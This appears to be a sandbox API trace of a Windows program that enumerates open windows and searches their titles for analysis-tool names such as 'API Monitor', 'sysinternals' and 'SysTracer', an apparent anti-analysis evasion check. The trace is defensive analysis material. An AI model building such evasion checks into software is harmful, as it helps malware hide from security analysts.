lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.795] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.795] strstr (_Str="Previous Automation Previously", _SubStr="- main thread") returned 0x0 [0158.795] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.796] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.796] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.796] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.796] strstr (_Str="Previous Automation Previously", _SubStr="API Monitor") returned 0x0 [0158.796] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.796] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.796] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.796] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.796] strstr (_Str="Previous Automation Previously", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.796] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.796] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.796] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.796] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.796] strstr (_Str="Previous Automation Previously", _SubStr="sysinternals") returned 0x0 [0158.796] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.797] lstrcpyA (in: lpString1=0x430400, lpString2="65904" | out: lpString1="65904") returned="65904" [0158.797] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.797] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.797] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.797] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.797] GetWindowTextA (in: hWnd=0x10170, lpString=0x340df8, nMaxCount=1024 | out: lpString="Abc") returned 3 [0158.797] lstrcpyA (in: lpString1=0x430800, lpString2="Abc" | out: lpString1="Abc") returned="Abc" [0158.797] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.797] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.797] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.797] GetClassNameA (in: hWnd=0x10170, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="Abccls") returned 6 [0158.797] lstrcpyA (in: lpString1=0x430c00, lpString2="Abccls" | out: lpString1="Abccls") returned="Abccls" [0158.797] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.797] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.797] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.798] strstr (_Str="Abc", _SubStr="- main thread") returned 0x0 [0158.798] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.798] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.798] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.798] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.798] strstr (_Str="Abc", _SubStr="API Monitor") returned 0x0 [0158.798] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.798] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.798] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.798] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.798] strstr (_Str="Abc", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.798] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.798] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.798] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.798] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.798] strstr (_Str="Abc", _SubStr="sysinternals") returned 0x0 [0158.799] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.799] lstrcpyA (in: lpString1=0x430400, lpString2="65900" | out: lpString1="65900") returned="65900" [0158.799] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.799] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.799] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.799] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.799] GetWindowTextA (in: hWnd=0x1016c, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Isolation") returned 9 [0158.799] lstrcpyA (in: lpString1=0x430800, lpString2="Isolation" | out: lpString1="Isolation") returned="Isolation" [0158.799] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.799] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.799] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.799] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="Isolationclass") returned 14 [0158.799] lstrcpyA (in: lpString1=0x430c00, lpString2="Isolationclass" | out: lpString1="Isolationclass") returned="Isolationclass" [0158.799] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.800] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.800] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.800] strstr (_Str="Isolation", _SubStr="- main thread") returned 0x0 [0158.800] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.800] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.800] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.800] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.800] strstr (_Str="Isolation", _SubStr="API Monitor") returned 0x0 [0158.800] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.800] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.800] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.800] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.800] strstr (_Str="Isolation", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.800] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.800] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.800] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.800] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.801] strstr (_Str="Isolation", _SubStr="sysinternals") returned 0x0 [0158.801] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.801] lstrcpyA (in: lpString1=0x430400, lpString2="65896" | out: lpString1="65896") returned="65896" [0158.801] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.801] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.801] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.801] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.801] GetWindowTextA (in: hWnd=0x10168, lpString=0x340df8, nMaxCount=1024 | out: lpString="Ship Loans") returned 10 [0158.801] lstrcpyA (in: lpString1=0x430800, lpString2="Ship Loans" | out: lpString1="Ship Loans") returned="Ship Loans" [0158.801] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.801] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.801] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.801] GetClassNameA (in: hWnd=0x10168, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="ship_Loans_cls") returned 14 [0158.801] lstrcpyA (in: lpString1=0x430c00, lpString2="ship_Loans_cls" | out: lpString1="ship_Loans_cls") returned="ship_Loans_cls" [0158.802] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.802] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.802] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.802] strstr (_Str="Ship Loans", _SubStr="- main thread") returned 0x0 [0158.802] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.802] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.802] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.802] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.802] strstr (_Str="Ship Loans", _SubStr="API Monitor") returned 0x0 [0158.802] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.802] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.802] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.802] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.802] strstr (_Str="Ship Loans", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.802] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.802] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.803] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.803] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.803] strstr (_Str="Ship Loans", _SubStr="sysinternals") returned 0x0 [0158.803] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.803] lstrcpyA (in: lpString1=0x430400, lpString2="65892" | out: lpString1="65892") returned="65892" [0158.803] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.803] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.803] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.803] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.803] GetWindowTextA (in: hWnd=0x10164, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Clause Swaziland Complimentary") returned 30 [0158.803] lstrcpyA (in: lpString1=0x430800, lpString2="Clause Swaziland Complimentary" | out: lpString1="Clause Swaziland Complimentary") returned="Clause Swaziland Complimentary" [0158.803] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.803] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.803] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.803] GetClassNameA (in: hWnd=0x10164, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="Clause_Swaziland_complimentary_") returned 31 [0158.803] lstrcpyA (in: lpString1=0x430c00, lpString2="Clause_Swaziland_complimentary_" | out: lpString1="Clause_Swaziland_complimentary_") returned="Clause_Swaziland_complimentary_" [0158.811] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.811] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.811] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.811] strstr (_Str="Clause Swaziland Complimentary", _SubStr="- main thread") returned 0x0 [0158.811] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.811] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.812] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.812] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.812] strstr (_Str="Clause Swaziland Complimentary", _SubStr="API Monitor") returned 0x0 [0158.812] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.812] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.812] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.812] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.812] strstr (_Str="Clause Swaziland Complimentary", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.812] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.812] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.812] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.812] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.812] strstr (_Str="Clause Swaziland Complimentary", _SubStr="sysinternals") returned 0x0 [0158.813] GetWindowTextA (in: hWnd=0x10160, lpString=0x340df8, nMaxCount=1024 | out: lpString="Chevrolet Play Mel") returned 18 [0158.813] GetClassNameA (in: hWnd=0x10160, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="chevroletplaymelwnd") returned 19 [0158.813] strstr (_Str="Chevrolet Play Mel", _SubStr="- main thread") returned 0x0 [0158.813] strstr (_Str="Chevrolet Play Mel", _SubStr="API Monitor") returned 0x0 [0158.813] strstr (_Str="Chevrolet Play Mel", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.814] strstr (_Str="Chevrolet Play Mel", _SubStr="sysinternals") returned 0x0 [0158.814] GetWindowTextA (in: hWnd=0x2015c, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Navigation Jay") returned 14 [0158.814] GetClassNameA (in: hWnd=0x2015c, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="navigationjaywnd") returned 16 [0158.814] strstr (_Str="Navigation Jay", _SubStr="- main thread") returned 0x0 [0158.814] strstr (_Str="Navigation Jay", _SubStr="API Monitor") returned 0x0 [0158.815] strstr (_Str="Navigation Jay", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.815] strstr (_Str="Navigation Jay", _SubStr="sysinternals") returned 0x0 [0158.815] GetWindowTextA (in: hWnd=0x10158, lpString=0x340df8, nMaxCount=1024 | out: lpString="Tri") returned 3 [0158.815] GetClassNameA (in: hWnd=0x10158, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="triwnd") returned 6 [0158.815] strstr (_Str="Tri", _SubStr="- main thread") returned 0x0 [0158.815] strstr (_Str="Tri", _SubStr="API Monitor") returned 0x0 [0158.816] strstr (_Str="Tri", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.816] strstr (_Str="Tri", _SubStr="sysinternals") returned 0x0 [0158.816] GetWindowTextA (in: hWnd=0x30116, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Calls Ccd Copyright") returned 19 [0158.816] GetClassNameA (in: hWnd=0x30116, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="calls_ccd_Copyright_app") returned 23 [0158.816] strstr (_Str="Calls Ccd Copyright", _SubStr="- main thread") returned 0x0 [0158.817] strstr (_Str="Calls Ccd Copyright", _SubStr="API Monitor") returned 0x0 [0158.817] strstr (_Str="Calls Ccd Copyright", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.817] strstr (_Str="Calls Ccd Copyright", _SubStr="sysinternals") returned 0x0 [0158.817] GetWindowTextA (in: hWnd=0x4012c, lpString=0x340df8, nMaxCount=1024 | out: lpString="GDI+ Window") returned 11 [0158.817] GetClassNameA (in: hWnd=0x4012c, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="GDI+ Hook Window Class") returned 22 [0158.817] strstr (_Str="GDI+ Window", _SubStr="- main thread") returned 0x0 [0158.818] strstr (_Str="GDI+ Window", _SubStr="API Monitor") returned 0x0 [0158.818] strstr (_Str="GDI+ Window", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.818] strstr (_Str="GDI+ Window", _SubStr="sysinternals") returned 0x0 [0158.818] GetWindowTextA (in: hWnd=0x30126, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.818] GetClassNameA (in: hWnd=0x30126, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="ARC Window Class") returned 16 [0158.819] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.819] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.819] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.819] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.821] GetWindowTextA (in: hWnd=0x30152, lpString=0x340df8, nMaxCount=1024 | out: lpString="HiddenFaxWindow") returned 15 [0158.821] GetClassNameA (in: hWnd=0x30152, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0158.821] strstr (_Str="HiddenFaxWindow", _SubStr="- main thread") returned 0x0 [0158.821] strstr (_Str="HiddenFaxWindow", _SubStr="API Monitor") returned 0x0 [0158.821] strstr (_Str="HiddenFaxWindow", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.821] strstr (_Str="HiddenFaxWindow", _SubStr="sysinternals") returned 0x0 [0158.822] GetWindowTextA (in: hWnd=0x10148, lpString=0x3401e0, nMaxCount=1024 | out: lpString="BluetoothNotificationAreaIconWindowClass") returned 40 [0158.822] GetClassNameA (in: hWnd=0x10148, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0158.822] strstr (_Str="BluetoothNotificationAreaIconWindowClass", _SubStr="- main thread") returned 0x0 [0158.822] strstr (_Str="BluetoothNotificationAreaIconWindowClass", _SubStr="API Monitor") returned 0x0 [0158.822] strstr (_Str="BluetoothNotificationAreaIconWindowClass", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.823] strstr (_Str="BluetoothNotificationAreaIconWindowClass", _SubStr="sysinternals") returned 0x0 [0158.823] GetWindowTextA (in: hWnd=0x10146, lpString=0x340df8, nMaxCount=1024 | out: lpString="MS_WebcheckMonitor") returned 18 [0158.823] GetClassNameA (in: hWnd=0x10146, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0158.823] strstr (_Str="MS_WebcheckMonitor", _SubStr="- main thread") returned 0x0 [0158.823] strstr (_Str="MS_WebcheckMonitor", _SubStr="API Monitor") returned 0x0 [0158.823] strstr (_Str="MS_WebcheckMonitor", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.825] strstr (_Str="MS_WebcheckMonitor", _SubStr="sysinternals") returned 0x0 [0158.825] GetWindowTextA (in: hWnd=0x60074, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.826] GetClassNameA (in: hWnd=0x60074, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="PNIHiddenWnd") returned 12 [0158.826] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.826] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.826] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.826] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.826] GetWindowTextA (in: hWnd=0x10132, lpString=0x340df8, nMaxCount=1024 | out: lpString="Media Center SSO") returned 16 [0158.827] GetClassNameA (in: hWnd=0x10132, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="Media Center SSO") returned 16 [0158.827] strstr (_Str="Media Center SSO", _SubStr="- main thread") returned 0x0 [0158.827] strstr (_Str="Media Center SSO", _SubStr="API Monitor") returned 0x0 [0158.827] strstr (_Str="Media Center SSO", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.827] strstr (_Str="Media Center SSO", _SubStr="sysinternals") returned 0x0 [0158.828] GetWindowTextA (in: hWnd=0x20020, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.828] GetClassNameA (in: hWnd=0x20020, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="ATL:000007FEFC0541F0") returned 20 [0158.828] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.828] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.828] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.828] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.829] GetWindowTextA (in: hWnd=0x20016, lpString=0x340df8, nMaxCount=1024 | out: lpString="Battery Meter") returned 13 [0158.829] GetClassNameA (in: hWnd=0x20016, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="SystemTray_Main") returned 15 [0158.829] strstr (_Str="Battery Meter", _SubStr="- main thread") returned 0x0 [0158.829] strstr (_Str="Battery Meter", _SubStr="API Monitor") returned 0x0 [0158.829] strstr (_Str="Battery Meter", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.830] strstr (_Str="Battery Meter", _SubStr="sysinternals") returned 0x0 [0158.830] GetWindowTextA (in: hWnd=0x2001c, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.830] GetClassNameA (in: hWnd=0x2001c, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0158.830] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.830] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.830] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.831] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.831] GetWindowTextA (in: hWnd=0x10124, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.831] GetClassNameA (in: hWnd=0x10124, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0158.831] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.831] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.831] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.831] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.832] GetWindowTextA (in: hWnd=0x1011e, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.832] GetClassNameA (in: hWnd=0x1011e, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0158.832] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.832] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.832] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.832] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.833] GetWindowTextA (in: hWnd=0x1011a, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.833] GetClassNameA (in: hWnd=0x1011a, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0158.833] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.833] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.833] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.833] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.833] GetWindowTextA (in: hWnd=0x10100, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.834] GetClassNameA (in: hWnd=0x10100, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.834] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.834] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.834] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.834] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.834] GetWindowTextA (in: hWnd=0x100fc, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.834] GetClassNameA (in: hWnd=0x100fc, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0158.835] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.835] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.835] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.836] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.836] GetWindowTextA (in: hWnd=0x100ee, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.836] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0158.836] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.836] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.836] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.837] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.837] GetWindowTextA (in: hWnd=0x100e4, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.837] GetClassNameA (in: hWnd=0x100e4, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.837] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.837] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.837] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.837] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.838] GetWindowTextA (in: hWnd=0x100de, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.838] GetClassNameA (in: hWnd=0x100de, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.838] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.838] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.838] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.838] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.839] GetWindowTextA (in: hWnd=0x200d8, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.839] GetClassNameA (in: hWnd=0x200d8, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.839] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.839] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.839] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.839] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.840] GetWindowTextA (in: hWnd=0x100c0, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Start menu") returned 10 [0158.840] GetClassNameA (in: hWnd=0x100c0, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="DV2ControlHost") returned 14 